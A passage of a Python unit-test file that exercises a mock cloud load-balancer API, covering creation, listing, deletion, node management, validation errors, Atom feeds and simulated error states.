self.assertEqual(r.resp.code, 404)
def test_multiple_regions_multiple_endpoints(self):
"""
API object created with multiple regions has multiple entries
in the service catalog.
"""
helper = APIMockHelper(self,
[LoadBalancerApi(regions=['ORD', 'DFW'])])
entry = helper.service_catalog_json['access']['serviceCatalog'][0]
self.assertEqual(2, len(entry['endpoints']))
def test_add_load_balancer(self):
"""
If created without nodes, no node information appears in the response
when making a request to ``POST /v1.0/<tenant_id>/loadbalancers``.
"""
lb_name = 'mimic_lb'
resp, body = self.successResultOf(json_request(
self, self.root, b"POST", self.uri + '/loadbalancers',
{
"loadBalancer": {
"name": lb_name,
"protocol": "HTTP",
"virtualIps": [{"type": "PUBLIC"}]
}
}
))
self.assertEqual(resp.code, 202)
self.assertEqual(body['loadBalancer']['name'], lb_name)
self.assertNotIn("nodeCount", body["loadBalancer"])
self.assertNotIn("nodes", body["loadBalancer"])
def test_add_load_balancer_request_with_no_body_causes_bad_request(self):
"""
Test to verify :func:`add_load_balancer` on ``POST /v1.0/<tenant_id>/loadbalancers``
"""
create_lb = request(self, self.root, b"POST", self.uri + '/loadbalancers', b"")
create_lb_response = self.successResultOf(create_lb)
self.assertEqual(create_lb_response.code, 400)
def test_add_load_balancer_request_with_invalid_body_causes_bad_request(self):
"""
Test to verify :func:`add_load_balancer` on ``POST /v1.0/<tenant_id>/loadbalancers``
"""
create_lb = request(self, self.root, b"POST", self.uri + '/loadbalancers', b"{ bad request: }")
create_lb_response = self.successResultOf(create_lb)
self.assertEqual(create_lb_response.code, 400)
def test_add_load_balancer_with_nodes(self):
"""
Making a request to ``POST /v1.0/<tenant_id>/loadbalancers`` with
nodes adds the nodes to the load balancer.
"""
lb_name = 'mimic_lb'
resp, body = self.successResultOf(json_request(
self, self.root, b"POST", self.uri + '/loadbalancers',
{
"loadBalancer": {
"name": lb_name,
"protocol": "HTTP",
"virtualIps": [{"type": "PUBLIC"}],
"nodes": [{"address": "127.0.0.2",
"port": 80,
"condition": "ENABLED",
"type": "PRIMARY"},
{"address": "127.0.0.0",
"port": 80,
"condition": "ENABLED",
"type": "SECONDARY"}]
}
}
))
self.assertEqual(resp.code, 202)
self.assertNotIn("nodeCount", body['loadBalancer'])
self.assertEqual(len(body['loadBalancer']['nodes']), 2)
def test_list_loadbalancers(self):
"""
Test to verify :func:`list_load_balancers` with on ``GET /v1.0/<tenant_id>/loadbalancers``
Create two load balancers, then list them and verify the ids
"""
test1_id = self._create_loadbalancer('test1')
test2_id = self._create_loadbalancer('test2')
list_lb = request(self, self.root, b"GET", self.uri + '/loadbalancers')
list_lb_response = self.successResultOf(list_lb)
list_lb_response_body = self.successResultOf(treq.json_content(list_lb_response))
self.assertEqual(list_lb_response.code, 200)
self.assertEqual(len(list_lb_response_body['loadBalancers']), 2)
self.assertTrue(list_lb_response_body['loadBalancers'][0]['id'] in [test1_id, test2_id])
self.assertTrue(list_lb_response_body['loadBalancers'][1]['id'] in [test1_id, test2_id])
self.assertTrue(list_lb_response_body['loadBalancers'][0]['id'] !=
list_lb_response_body['loadBalancers'][1]['id'])
def test_list_loadbalancers_have_no_nodes(self):
"""
When listing load balancers, nodes do not appear even if the load
balanacer has nodes. "nodeCount" is present for all the load
balancers, whether or not there are nodes on the load balancer.
"""
self._create_loadbalancer('no_nodes')
self._create_loadbalancer(
'3nodes', nodes=[{"address": "1.1.1.{0}".format(i),
"port": 80, "condition": "ENABLED"}
for i in range(1, 4)])
list_resp, list_body = self.successResultOf(json_request(
self, self.root, b"GET", self.uri + '/loadbalancers'))
self.assertEqual(list_resp.code, 200)
self.assertEqual(len(list_body['loadBalancers']), 2)
for lb in list_body['loadBalancers']:
self.assertNotIn("nodes", lb)
self.assertEqual(
lb['nodeCount'],
0 if lb['name'] == 'no_nodes' else 3)
def test_delete_loadbalancer(self):
"""
Test to verify :func:`delete_load_balancer` with on
``DELETE /v1.0/<tenant_id>/loadbalancers/<lb_id>``
Create two load balancers, then list them and verify the ids
"""
# These will fail if the servers weren't created
test1_id = self._create_loadbalancer('test1')
test2_id = self._create_loadbalancer('test2')
delete_lb = request(self, self.root, b'DELETE', self.uri + '/loadbalancers/' + str(test1_id))
del_lb_response = self.successResultOf(delete_lb)
# This response code does not match the Rackspace documentation which specifies a 200 response
# See comment: http://bit.ly/1AVHs3v
self.assertEqual(del_lb_response.code, 202)
del_lb_response_body = self.successResultOf(treq.content(del_lb_response))
self.assertEqual(del_lb_response_body, b'')
# List lb to make sure the correct lb is gone and the other remains
list_lb = request(self, self.root, b"GET", self.uri + '/loadbalancers')
list_lb_response = self.successResultOf(list_lb)
list_lb_response_body = self.successResultOf(treq.json_content(list_lb_response))
self.assertTrue(len(list_lb_response_body['loadBalancers']), 1)
self.assertTrue(list_lb_response_body['loadBalancers'][0]['id'] == test2_id)
def test_get_loadbalancer_with_nodes(self):
"""
If there are nodes on the load balancer, "nodes" (but not "nodeCount")
appears in the response when making a request to
``GET /v1.0/<tenant_id>/loadbalancers/<loadbalancer_id>``.
"""
lb_id = self._create_loadbalancer(
nodes=[{"address": "1.2.3.4", "port": 80, "condition": "ENABLED"}])
resp, body = self.successResultOf(json_request(
self, self.root, b"GET", self.uri + '/loadbalancers/' + str(lb_id)))
self.assertEqual(resp.code, 200)
self.assertEqual(body['loadBalancer']['id'], lb_id)
self.assertNotIn('nodeCount', body['loadBalancer'])
self.assertEqual(len(body['loadBalancer']['nodes']), 1)
def test_get_loadbalancer_no_nodes(self):
"""
If there are no nodes on the load balancer, then neither "nodeCount"
nor "nodes" appear in the response when making a request to
``GET /v1.0/<tenant_id>/loadbalancers/<loadbalancer_id>``
"""
lb_id = self._create_loadbalancer()
resp, body = self.successResultOf(json_request(
self, self.root, b"GET", self.uri + '/loadbalancers/' + str(lb_id)))
self.assertEqual(resp.code, 200)
self.assertEqual(body['loadBalancer']['id'], lb_id)
self.assertNotIn('nodeCount', body['loadBalancer'])
self.assertNotIn('nodes', body['loadBalancer'])
def test_get_non_existant_loadbalancer(self):
"""
Test to verify :func:`get_load_balancers` for a non existant load balancer id.
"""
get_lb = request(self, self.root, b"GET", self.uri + '/loadbalancers/123')
get_lb_response = self.successResultOf(get_lb)
self.assertEqual(get_lb_response.code, 404)
def test_delete_non_existant_loadbalancer(self):
"""
Test to verify :func:`delete_load_balancers` for a non existant load balancer.
"""
delete_lb = request(self, self.root, b'DELETE', self.uri + '/loadbalancers/123')
delete_lb_response = self.successResultOf(delete_lb)
self.assertEqual(delete_lb_response.code, 404)
def test_list_loadbalancers_when_none_exist(self):
"""
Test to verify :func:`list_load_balancers` when no loadbalancers exist.
"""
list_lb = request(self, self.root, b'GET', self.uri + '/loadbalancers')
list_lb_response = self.successResultOf(list_lb)
self.assertEqual(list_lb_response.code, 200)
list_lb_response_body = self.successResultOf(treq.json_content(list_lb_response))
self.assertEqual(list_lb_response_body, {"loadBalancers": []})
def test_different_tenants_same_region_different_lbs(self):
"""
Creating a LB for one tenant in a particular region should not
create it for other tenants in the same region.
"""
self._create_loadbalancer()
other_tenant = TenantAuthentication(self, self.root, "other", "other")
list_lb_response, list_lb_response_body = self.successResultOf(
request_with_content(
self, self.root, b"GET",
other_tenant.get_service_endpoint("cloudLoadBalancers")
+ "/loadbalancers"))
self.assertEqual(list_lb_response.code, 200)
list_lb_response_body = json.loads(
list_lb_response_body.decode("utf-8")
)
self.assertEqual(list_lb_response_body, {"loadBalancers": []})
def test_same_tenant_different_regions(self):
"""
Creating an LB for a tenant in one different regions should create it
in another region for that tenant.
"""
helper = APIMockHelper(self,
[LoadBalancerApi(regions=["ORD", "DFW"])])
self._create_loadbalancer(api_helper=helper)
list_lb_response, list_lb_response_body = self.successResultOf(
request_with_content(
self, helper.root, b"GET",
helper.get_service_endpoint("cloudLoadBalancers", "DFW")
+ "/loadbalancers"))
self.assertEqual(list_lb_response.code, 200)
list_lb_response_body = json.loads(
list_lb_response_body.decode("utf-8")
)
self.assertEqual(list_lb_response_body, {"loadBalancers": []})
def _bulk_delete(test_case, root, uri, lb_id, node_ids):
"""Bulk delete multiple nodes."""
query = '?' + '&'.join('id=' + str(node_id) for node_id in node_ids)
endpoint = uri + '/loadbalancers/' + str(lb_id) + '/nodes' + query
d = request(test_case, root, b"DELETE", endpoint)
response = test_case.successResultOf(d)
body = test_case.successResultOf(treq.content(response))
if body == b'':
body = EMPTY_RESPONSE
else:
body = json.loads(body.decode("utf-8"))
return response, body
def _update_clb_node(test_case, helper, lb_id, node_id, update_data,
request_func=json_request):
"""
Return the response for updating a CLB node.
"""
return test_case.successResultOf(request_func(
test_case, helper.root, b"PUT",
"{0}/loadbalancers/{1}/nodes/{2}".format(
helper.get_service_endpoint("cloudLoadBalancers"),
lb_id, node_id),
update_data
))
class LoadbalancerNodeAPITests(SynchronousTestCase):
"""
Tests for the Loadbalancer plugin API for CRUD for nodes.
"""
def setUp(self):
"""
Create a :obj:`MimicCore` with :obj:`LoadBalancerApi` as the only plugin.
And create a load balancer and add nodes to the load balancer.
"""
self.helper = APIMockHelper(self, [LoadBalancerApi()])
self.root = self.helper.root
self.uri = self.helper.uri
create_lb = request(
self, self.root, b"POST", self.uri + '/loadbalancers',
json.dumps({
"loadBalancer": {
"name": "test_lb",
"protocol": "HTTP",
"virtualIps": [{"type": "PUBLIC"}]
}
}).encode("utf-8")
)
create_lb_response = self.successResultOf(create_lb)
self.create_lb_response_body = self.successResultOf(treq.json_content(
create_lb_response))
self.lb_id = self.create_lb_response_body["loadBalancer"]["id"]
create_node = self._create_nodes(["127.0.0.1"])
[(self.create_node_response, self.create_node_response_body)] = create_node
self.node = self.create_node_response_body["nodes"]
def _create_nodes(self, addresses):
"""
Create nodes based on the addresses passed.
:param list addresses: addresses to create nodes for.
:return: a list of two-tuples of (response, response_body).
"""
responses = [
request(
self, self.root, b"POST", self.uri + '/loadbalancers/' +
str(self.create_lb_response_body["loadBalancer"]["id"]) + '/nodes',
json.dumps({"nodes": [{"address": address,
"port": 80,
"condition": "ENABLED",
"type": "PRIMARY",
"weight": 10}]}).encode("utf-8"))
for address in addresses]
responses = [self.successResultOf(response) for response in responses]
response_bodies = [self.successResultOf(treq.json_content(response))
for response in responses]
return zip(responses, response_bodies)
def _get_nodes(self, lb_id):
"""Get all the nodes in a LB."""
list_nodes = request(
self, self.root, b"GET", self.uri + '/loadbalancers/' +
str(lb_id) + '/nodes')
response = self.successResultOf(list_nodes)
body = self.successResultOf(treq.json_content(response))
return body['nodes']
def test_add_node_to_loadbalancer(self):
"""
Test to verify :func: `add_node` create a node successfully.
"""
self.assertEqual(self.create_node_response.code, 202)
self.assertEqual(len(self.create_node_response_body["nodes"]), 1)
# verify that the node has all the attributes
node1 = self.create_node_response_body["nodes"][0]
self.assertEqual(node1["status"], "ONLINE")
self.assertEqual(node1["port"], 80)
self.assertEqual(node1["type"], "PRIMARY")
self.assertTrue(node1["id"])
self.assertEqual(node1["address"], "127.0.0.1")
self.assertEqual(node1["condition"], "ENABLED")
self.assertEqual(node1["weight"], 10)
def test_add_multiple_nodes(self):
"""
Test to verify :func: `add_node` creates multiple node successfully.
"""
create_multiple_nodes = request(
self, self.root, b"POST", self.uri + '/loadbalancers/' +
str(self.lb_id) + '/nodes',
json.dumps({"nodes": [{"address": "127.0.0.2",
"port": 80,
"condition": "ENABLED",
"type": "PRIMARY"},
{"address": "127.0.0.0",
"port": 80,
"condition": "ENABLED",
"type": "SECONDARY"}]}).encode("utf-8")
)
create_node_response = self.successResultOf(create_multiple_nodes)
create_node_response_body = self.successResultOf(treq.json_content(
create_node_response))
self.assertEqual(create_node_response.code, 202)
self.assertEqual(len(create_node_response_body["nodes"]), 2)
def test_add_duplicate_node(self):
"""
Test to verify :func: `add_node` does not allow creation of duplicate nodes.
"""
create_duplicate_nodes = request(
self, self.root, b"POST", self.uri + '/loadbalancers/' +
str(self.lb_id) + '/nodes',
json.dumps({"nodes": [{"address": "127.0.0.1",
"port": 80,
"condition": "ENABLED",
"type": "PRIMARY"}]}).encode("utf-8")
)
create_node_response = self.successResultOf(create_duplicate_nodes)
self.assertEqual(create_node_response.code, 413)
def test_add_single_over_node_limit(self):
"""
Test to verify :func: `add_node` does not allow creation of a single
node at a time to exceed the node limit.
Note: This assumes the node limit is 25. If the limit is made
configurable, this test will need to be updated.
"""
for port in range(101, 126):
request(
self, self.root, b"POST", self.uri + '/loadbalancers/' +
str(self.lb_id) + '/nodes',
json.dumps({"nodes": [{"address": "127.0.0.1",
"port": port,
"condition": "ENABLED"}]})
.encode("utf-8")
)
create_over_node = request(
self, self.root, b"POST", self.uri + '/loadbalancers/' +
str(self.lb_id) + '/nodes',
json.dumps({"nodes": [{"address": "127.0.0.2",
"port": 130,
"condition": "ENABLED",
"type": "SECONDARY"}]}).encode("utf-8")
)
create_node_response = self.successResultOf(create_over_node)
self.assertEqual(create_node_response.code, 413)
def test_add_bulk_nodes_over_limit(self):
"""
Test to verify :func: `add_node` does not allow creation of a single
node at a time to exceed the node limit.
Note: This assumes the node limit is 25. If the limit is made
configurable, this test will need to be updated.
"""
add_node_list = []
for a in range(26):
node_addr = "127.0.0.{0}".format(a)
add_node_list.append({"address": node_addr,
"port": 88,
"condition": "ENABLED",
"type": "SECONDARY"})
create_over_node = request(
self, self.root, b"POST", self.uri + '/loadbalancers/' +
str(self.lb_id) + '/nodes',
json.dumps({"nodes": add_node_list}).encode("utf-8")
)
create_node_response = self.successResultOf(create_over_node)
self.assertEqual(create_node_response.code, 413)
def test_add_node_request_with_no_body_causes_bad_request(self):
"""
Test to verify :func: `add_node` does not fail on bad request.
"""
create_duplicate_nodes = request(
self, self.root, b"POST", self.uri + '/loadbalancers/' +
str(self.lb_id) + '/nodes', b"")
create_node_response = self.successResultOf(create_duplicate_nodes)
self.assertEqual(create_node_response.code, 400)
def test_add_node_request_with_invalid_body_causes_bad_request(self):
"""
Test to verify :func: `add_node` does not fail on bad request.
"""
create_duplicate_nodes = request(
self, self.root, b"POST", self.uri + '/loadbalancers/' +
str(self.lb_id) + '/nodes', b"{ bad request: }")
create_node_response = self.successResultOf(create_duplicate_nodes)
self.assertEqual(create_node_response.code, 400)
def test_add_node_to_non_existant_loadbalancer(self):
"""
Test to verify :func: `add_node` does not allow creation of nodes
on non existant load balancers.
"""
create_duplicate_nodes = request(
self, self.root, b"POST", self.uri + '/loadbalancers/123/nodes',
json.dumps({"nodes": [{"address": "127.0.0.1",
"port": 80,
"condition": "ENABLED",
"type": "PRIMARY"}]}).encode("utf-8")
)
create_node_response = self.successResultOf(create_duplicate_nodes)
self.assertEqual(create_node_response.code, 404)
def test_list_nodes_on_loadbalancer(self):
"""
Test to verify :func: `list_node` lists the nodes on the loadbalancer.
"""
list_nodes = request(
self, self.root, b"GET", self.uri + '/loadbalancers/' +
str(self.lb_id) + '/nodes')
list_nodes_response = self.successResultOf(list_nodes)
list_nodes_response_body = self.successResultOf(treq.json_content(
list_nodes_response))
self.assertEqual(list_nodes_response.code, 200)
self.assertEqual(len(list_nodes_response_body["nodes"]), 1)
def test_list_nodes_on_non_existant_loadbalancer(self):
"""
Test to verify :func: `list_node` lists the nodes on the loadbalancer.
"""
list_nodes = request(
self, self.root, b"GET", self.uri + '/loadbalancers/123/nodes')
list_nodes_response = self.successResultOf(list_nodes)
self.assertEqual(list_nodes_response.code, 404)
def test_get_node_on_loadbalancer(self):
"""
Test to verify :func: `get_node` gets the nodes on the loadbalancer.
"""
get_nodes = request(
self, self.root, b"GET", self.uri + '/loadbalancers/' +
str(self.lb_id) + '/nodes/'
+ str(self.node[0]["id"]))
get_node_response = self.successResultOf(get_nodes)
get_node_response_body = self.successResultOf(treq.json_content(
get_node_response))
self.assertEqual(get_node_response.code, 200)
self.assertEqual(len(self.node), 1)
self.assertEqual(get_node_response_body["node"]["id"],
self.node[0]["id"])
def test_get_node_on_non_existant_loadbalancer(self):
"""
Test to verify :func: `get_node` does get a nodes on a
non existant loadbalancer.
"""
get_nodes = request(
self, self.root, b"GET", self.uri + '/loadbalancers/123' +
'/nodes/' + str(self.node[0]["id"]))
get_node_response = self.successResultOf(get_nodes)
self.assertEqual(get_node_response.code, 404)
def test_get_non_existant_node_on_loadbalancer(self):
"""
Test to verify :func: `get_node` does not get a non existant node.
"""
get_nodes = request(
self, self.root, b"GET", self.uri + '/loadbalancers/' +
str(self.lb_id) + '/nodes/123')
get_node_response = self.successResultOf(get_nodes)
self.assertEqual(get_node_response.code, 404)
def test_delete_node_on_loadbalancer(self):
"""
Test to verify :func: `delete_node` deletes the node on the loadbalancer.
"""
delete_nodes = request(
self, self.root, b"DELETE", self.uri + '/loadbalancers/' +
str(self.lb_id) + '/nodes/'
+ str(self.node[0]["id"]))
delete_node_response = self.successResultOf(delete_nodes)
self.assertEqual(delete_node_response.code, 202)
# assert that it lists correctly after
list_nodes_resp, list_nodes_body = self.successResultOf(json_request(
self, self.root, b"GET", self.uri + '/loadbalancers/' +
str(self.lb_id) + '/nodes'))
self.assertEqual(list_nodes_resp.code, 200)
self.assertEqual(len(list_nodes_body["nodes"]), 0)
def test_delete_node_on_non_existant_loadbalancer(self):
"""
Test to verify :func: `delete_node` does delete a nodes on a
non existant loadbalancer.
"""
delete_nodes = request(
self, self.root, b"DELETE", self.uri + '/loadbalancers/123' +
'/nodes/' + str(self.node[0]["id"]))
delete_node_response = self.successResultOf(delete_nodes)
self.assertEqual(delete_node_response.code, 404)
def test_delete_non_existant_node_on_loadbalancer(self):
"""
Test to verify :func: `delete_node` does not delete a non existant node.
"""
delete_nodes = request(
self, self.root, b"DELETE", self.uri + '/loadbalancers/' +
str(self.lb_id) + '/nodes/123')
delete_node_response = self.successResultOf(delete_nodes)
self.assertEqual(delete_node_response.code, 404)
def test_bulk_delete(self):
"""
Test to verify :func: `delete_nodes` deletes the nodes on the loadbalancer.
"""
node_results = self._create_nodes(['127.0.0.2', '127.0.0.3', '127.0.0.4'])
node_ids = [
node_result['id']
for (response, body) in node_results
for node_result in body['nodes']]
node_ids_to_delete = node_ids[:-1]
response, body = _bulk_delete(
self, self.root, self.uri, self.lb_id, node_ids_to_delete)
self.assertEqual(response.code, 202)
self.assertEqual(body, EMPTY_RESPONSE)
remaining_nodes = self._get_nodes(self.lb_id)
# The one in setUp and the extra one we created are remaining
self.assertEqual(
[node['id'] for node in remaining_nodes],
[self.node[0]['id'], node_ids[-1]])
def test_bulk_delete_no_nodes(self):
"""
When deleting multiple nodes but not giving any node IDs, a special
error is returned.
"""
response, body = _bulk_delete(
self, self.root, self.uri, self.lb_id, [])
self.assertEqual(response.code, 400)
self.assertEqual(
body,
{'code': 400,
'message': "Must supply one or more id's to process this request."})
def test_bulk_delete_no_nodes_invalid_lb(self):
"""
When trying to delete multiple nodes from a non-existent LB, the error
for an empty node list takes precedence over the error for a
non-existing LB.
"""
lb_id = self.lb_id + 1
response, body = _bulk_delete(self, self.root, self.uri, lb_id, [])
self.assertEqual(response.code, 400)
self.assertEqual(
body,
{'code': 400,
'message': "Must supply one or more id's to process this request."})
def test_bulk_delete_invalid_lb(self):
"""
Bulk-deleting nodes from a non-existent LB returns a 404 and an appropriate
message.
"""
lb_id = self.lb_id + 1
node_ids_to_delete = [self.node[0]['id']]
response, body = _bulk_delete(self, self.root, self.uri, lb_id, node_ids_to_delete)
self.assertEqual(response.code, 404)
self.assertEqual(
body,
{'code': 404,
'message': "Load balancer not found"})
def test_bulk_delete_nonexistent_nodes(self):
"""
When trying to delete multiple nodes, if any of the nodes don't exist, no
nodes are deleted and a special error result is returned.
"""
node_ids_to_delete = [self.node[0]['id'], 1000000, 1000001]
response, body = _bulk_delete(
self, self.root, self.uri, self.lb_id, node_ids_to_delete)
self.assertEqual(response.code, 400)
self.assertEqual(
body,
{
"validationErrors": {
"messages": [
"Node ids 1000000,1000001 are not a part of your loadbalancer"
]
},
"message": "Validation Failure",
"code": 400,
"details": "The object is not valid"
}
)
# and the one valid node that we tried to delete is still there
remaining = [node['id'] for node in self._get_nodes(self.lb_id)]
self.assertEquals(remaining, [self.node[0]['id']])
def test_updating_node_invalid_json(self):
"""
When updating a node, if invalid JSON is provided (both actually not
valid JSON and also not conforming to the schema), a 400 invalid
JSON error will be returned. This takes precedence over whether or not
a load balancer or node actually exists, and precedence over
validation errors.
"""
real_lb_id = self.lb_id
real_node_id = self.node[0]['id']
fake_lb_id = real_lb_id + 1
fake_node_id = real_node_id + 1
combos = ((real_lb_id, real_node_id),
(real_lb_id, fake_node_id),
(fake_lb_id, fake_node_id))
invalids = (
{"node": {"weight": 1, "hockey": "stick"}},
{"node": {"weight": 1, "status": "OFFLINE"}},
{"node": {"weight": 1},
"other": "garbage"},
{"node": []},
{"node": 1},
{"nodes": {"weight": 1}},
[],
b"not JSON",
{"node": {"weight": "not a number", "address": "1.1.1.1"}},
{"node": {"condition": "INVALID", "id": 1}},
{"node": {"type": "INVALID", "weight": 1000}},
{"node": {"weight": "not a number", "port": 80}}
)
expected = invalid_json_schema()
for lb_id, node_id in combos:
for invalid in invalids:
resp, body = _update_clb_node(
self, self.helper, lb_id, node_id, invalid)
self.assertEqual(
(body, resp.code), expected,
"{0} should have returned invalid JSON error".format(
invalid))
self.assertEqual(
self._get_nodes(real_lb_id), self.node)
def test_updating_node_validation_error(self):
"""
When updating a node, if the address or port are provided,
a 400 validation error will be returned because those are immutable.
If the weight is <1 or >100, a 400 validation will also be returned.
These takes precedence over whether or not a load balancer or node
actually exists. The error message also contains a list of all the
validation failures.
"""
real_lb_id = self.lb_id
real_node_id = self.node[0]['id']
fake_lb_id = real_lb_id + 1
fake_node_id = real_node_id + 1
combos = ((real_lb_id, real_node_id),
(real_lb_id, fake_node_id),
(fake_lb_id, fake_node_id))
for lb_id, node_id in combos:
data = {"node": {"weight": 1000, "address": "1.1.1.1",
"port": 80, "type": "PRIMARY", "id": 12345}}
for popoff in (None, "address", "port", "weight"):
if popoff:
del data["node"][popoff]
resp, body = _update_clb_node(
self, self.helper, lb_id, node_id, data)
actual = (body, resp.code)
expected = updating_node_validation_error(
address="address" in data["node"],
port="port" in data["node"],
weight="weight" in data["node"],
id=True) # id is always there
self.assertEqual(
actual, expected,
"Input of {0}.\nGot: {1}\nExpected: {2}".format(
data,
json.dumps(actual, indent=2),
json.dumps(expected, indent=2)))
self.assertEqual(
self._get_nodes(real_lb_id), self.node)
def test_updating_node_checks_for_invalid_loadbalancer_id(self):
"""
If the input is valid, but the load balancer ID does not exist,
a 404 error is returned.
"""
resp, body = _update_clb_node(
self, self.helper, self.lb_id + 1, 1234, {"node": {"weight": 1}})
self.assertEqual((body, resp.code), loadbalancer_not_found())
self.assertEqual(self._get_nodes(self.lb_id), self.node)
def test_updating_node_checks_for_invalid_node_id(self):
"""
If the input is valid, but the node ID does not exist, a 404 error is
returned.
"""
resp, body = _update_clb_node(
self, self.helper, self.lb_id, self.node[0]["id"] + 1,
{"node": {"weight": 1}})
self.assertEqual((body, resp.code), node_not_found())
self.assertEqual(self._get_nodes(self.lb_id), self.node)
def test_updating_node_success(self):
"""
Updating a node successfully changes its values. The response from a
successful change is just the values that changed. The body is an
empty string. It also updates the atom feed of the node and returns
that when GETing ../loadbalancers/lbid/nodes/nodeid.atom
"""
original = self.node[0]
expected = original.copy()
change = {
"condition": "DISABLED",
"weight": 100,
"type": "SECONDARY"
}
expected.update(change)
# sanity check to make sure we're actually changing stuff
self.assertTrue(all([change[k] != original[k] for k in change.keys()]))
resp, body = _update_clb_node(
self, self.helper, self.lb_id, self.node[0]["id"],
json.dumps({"node": change}).encode("utf-8"),
request_func=request_with_content)
self.assertEqual(resp.code, 202)
self.assertEqual(body, b"")
self.assertEqual(self._get_nodes(self.lb_id)[0], expected)
# check if feed is updated
d = request(
self, self.root, b"GET",
"{0}/loadbalancers/{1}/nodes/{2}.atom".format(self.uri, self.lb_id,
self.node[0]["id"]))
feed_response = self.successResultOf(d)
self.assertEqual(feed_response.code, 200)
self.assertEqual(
self.successResultOf(treq.content(feed_response)).decode("utf-8"),
("<feed xmlns=\"http://www.w3.org/2005/Atom\"><entry>"
"<summary>Node successfully updated with address: '127.0.0.1', "
"port: '80', weight: '100', condition: 'DISABLED'</summary>"
"<updated>1970-01-01T00:00:00.000000Z</updated></entry></feed>"))
def test_get_feed_node_404(self):
"""
Getting feed of non-existent node returns 404 with "Node not found"
XML
"""
d = request(
self, self.root, b"GET",
"{0}/loadbalancers/{1}/nodes/{2}.atom".format(self.uri, self.lb_id, 0))
feed_response = self.successResultOf(d)
self.assertEqual(feed_response.code, 404)
self.assertEqual(
self.successResultOf(treq.content(feed_response)).decode("utf-8"),
('<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
'<itemNotFound xmlns="http://docs.openstack.org/loadbalancers/api/v1.0" code="404">'
'<message>Node not found</message></itemNotFound>'))
def test_get_feed_clb_404(self):
"""
Getting feed of node of non-existent CLB returns 404 with
"load balancer not found" XML
"""
d = request(
self, self.root, b"GET",
"{0}/loadbalancers/{1}/nodes/{2}.atom".format(self.uri, 0, 0))
feed_response = self.successResultOf(d)
self.assertEqual(feed_response.code, 404)
self.assertEqual(
self.successResultOf(treq.content(feed_response)).decode("utf-8"),
('<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
'<itemNotFound xmlns="http://docs.openstack.org/loadbalancers/api/v1.0" code="404">'
'<message>Load balancer not found</message></itemNotFound>'))
class LoadbalancerAPINegativeTests(SynchronousTestCase):
"""
Tests for the Loadbalancer plugin API for error injection
"""
def setUp(self):
"""
Create a :obj:`MimicCore` with :obj:`LoadBalancerApi` as the only plugin
"""
helper = APIMockHelper(self, [LoadBalancerApi()])
self.root = helper.root
self.uri = helper.uri
self.helper = helper
def _create_loadbalancer_for_given_metadata(self, metadata=None):
"""
Helper method to create a load balancer with the given metadata
"""
create_lb = request(
self, self.root, b"POST", self.uri + '/loadbalancers',
json.dumps({
"loadBalancer": {
"name": "test_lb",
"protocol": "HTTP",
"virtualIps": [{"type": "PUBLIC"}],
"metadata": metadata or []
}
}).encode("utf-8")
)
create_lb_response = self.successResultOf(create_lb)
return create_lb_response
def _add_node_to_lb(self, lb_id):
"""
Adds a node to the load balancer and returns the response object
"""
create_node = request(
self, self.root, b"POST", self.uri + '/loadbalancers/'
+ str(lb_id) + '/nodes',
json.dumps({"nodes": [{"address": "127.0.0.1",
"port": 80,
"condition": "ENABLED",
"type": "PRIMARY"}]}).encode("utf-8")
)
create_node_response = self.successResultOf(create_node)
return create_node_response
def _get_loadbalancer(self, lb_id):
"""
Makes the `GET` call for the given loadbalancer id and returns the
load balancer object.
"""
get_lb = request(self, self.root, b"GET", self.uri + '/loadbalancers/' + str(lb_id))
get_lb_response = self.successResultOf(get_lb)
get_lb_response_body = self.successResultOf(treq.json_content(get_lb_response))
return get_lb_response_body
def _delete_loadbalancer(self, lb_id):
"""
Deletes the given load balancer id and returns the response
"""
delete_lb = request(self, self.root, b"DELETE", self.uri + '/loadbalancers/' +
str(lb_id))
return self.successResultOf(delete_lb)
def _create_loadbalancer(self, metadata):
"""Create a load balancer and return the response body."""
create_response = self._create_loadbalancer_for_given_metadata(metadata)
self.assertEqual(create_response.code, 202)
create_lb_response_body = self.successResultOf(treq.json_content(create_response))
lb = create_lb_response_body["loadBalancer"]
self.assertEqual(lb["status"], "ACTIVE")
return lb
def test_create_load_balancer_in_building_state(self):
"""
Test to verify the created load balancer remains in building
state for the time is seconds specified in the metadata.
Adding a node to a lb in BUILD status results in 422.
"""
metadata = [{"key": "lb_building", "value": 1}]
create_response = self._create_loadbalancer_for_given_metadata(metadata)
self.assertEqual(create_response.code, 202)
create_lb_response_body = self.successResultOf(treq.json_content(create_response))
lb = create_lb_response_body["loadBalancer"]
self.assertEqual(lb["status"], "BUILD")
create_node_response = self._add_node_to_lb(lb["id"])
self.assertEqual(create_node_response.code, 422)
def test_load_balancer_goes_into_error_state_when_adding_node(self):
"""
Test to verify a load balancer goes into error state when adding a node.
Adding a node to a loadbalancer in ERROR state results in 422.
And such a load balancer can only be deleted.
"""
metadata = [{"key": "lb_error_state", "value": "error"}]
lb = self._create_loadbalancer(metadata)
create_node_response = self._add_node_to_lb(lb["id"])
self.assertEqual(create_node_response.code, 202)
# get loadbalncer after adding node and verify its in error state
errored_lb = self._get_loadbalancer(lb["id"])
self.assertEqual(errored_lb["loadBalancer"]["status"], "ERROR")
# adding another node to a lb in ERROR state, results in 422
create_node_response = self._add_node_to_lb(lb["id"])
self.assertEqual(create_node_response.code, 422)
# An lb in ERROR state can be deleted
delete_lb = request(self, self.root, b"DELETE", self.uri + '/loadbalancers/' +
str(lb["id"]))
delete_lb_response = self.successResultOf(delete_lb)
self.assertEqual(delete_lb_response.code, 202)
def test_load_balancer_goes_into_pending_update_state(self):
"""
Test to verify a load balancer goes into PENDING-UPDATE state, for
the given time in seconds when any action other than DELETE is performed
on the lb.
Adding a node to a loadbalancer in PENDING-UPDATE state results in 422.
And such a load balancer can be deleted.
"""
metadata = [{"key": "lb_pending_update", "value": 30}]
lb = self._create_loadbalancer(metadata)
create_node_response = self._add_node_to_lb(lb["id"])
self.assertEqual(create_node_response.code, 202)
# get loadbalncer after adding node and verify its in PENDING-UPDATE state
errored_lb = self._get_loadbalancer(lb["id"])
self.assertEqual(errored_lb["loadBalancer"]["status"], "PENDING-UPDATE")
# Trying to add/list/delete node on a lb in PENDING-UPDATE state, results in 422
create_node_response = self._add_node_to_lb(lb["id"])
self.assertEqual(create_node_response.code, 422)
delete_nodes = request(
self, self.root, b"DELETE", self.uri + '/loadbalancers/' +
str(lb["id"]) + '/nodes/123')
self.assertEqual(self.successResultOf(delete_nodes).code, 422)
# An lb in PENDING-UPDATE state can be deleted
delete_lb = request(self, self.root, b"DELETE", self.uri + '/loadbalancers/' +
str(lb["id"]))
